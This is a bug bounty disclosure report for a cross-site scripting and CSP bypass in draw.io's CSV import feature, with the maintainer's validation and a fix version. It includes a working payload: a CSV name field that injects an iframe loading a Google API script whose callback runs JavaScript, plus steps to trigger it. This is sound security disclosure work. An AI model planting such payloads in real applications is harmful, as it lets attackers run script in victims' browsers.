Cross-site Scripting and CSP Bypass in app.diagrams.net in jgraph/drawio

Valid

Reported on

May 4th 2023

Description

The application allows the user to import a CSV template into the schema, but does not clean the input from the columns resulting in any javascript code being executed.

Proof of Concept

##
## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
##
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
#
## ---- CSV below this line. First line are column names. ----
name,position,id,location,manager,email,fill,stroke,refs,url,image
Tessa Miller'"><iframe srcdoc='<script src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz&#x22;-alert(document.domain)-&#x22;></script>'>,CFO,emi,Office 1,,me@example.com,default,#6c8ebf,,https://www.draw.io,https://cdn3.iconfinder.com/data/icons/user-avatars-1/512/users-3-128.png

Step to reproduce

Click Insert button -> Advanced -> CSV -> Paste the payload above -> Trigger XSS

Evidence

PoC

Impact

XSS, in some cases it is possible to rce on the desktop app.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 7 months ago
Nhien.IT
7 months ago

Researcher

Public link: PoC

Nhien.IT
7 months ago

Researcher

Hi,

If the public link doesn't trigger XSS after the first time, please refresh the url again.

Thanks!

David Benson
7 months ago

Maintainer

Hi, thanks for the report. The base report is certainly valid. Could you just clarify a few things please:

"in some cases it is possible to rce on the desktop app." That would be a serious issue, but you must provide a PoC.

Looking at the severity, https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Why is the availability marked as low? How does this affect the service availability?

Nhien.IT modified the report
7 months ago
Nhien.IT
7 months ago

Researcher

Hi,

As in previous reports I see that some other researchers can abuse this vulnerability to upgrade to RCE but I haven't found a way to exploit it yet.

As for severity I'm a bit confused that availability is None. I just updated!

Thank you for this incident!

David Benson validated this vulnerability 7 months ago

Thanks. We haven't managed to recreate problem in the desktop version to date.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nhien.IT
7 months ago

Researcher

Thanks @maintainer

David Benson marked this as fixed in 21.2.8 with commit c7ac63 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jun 1st 2023
David Benson published this vulnerability 6 months ago
to join this conversation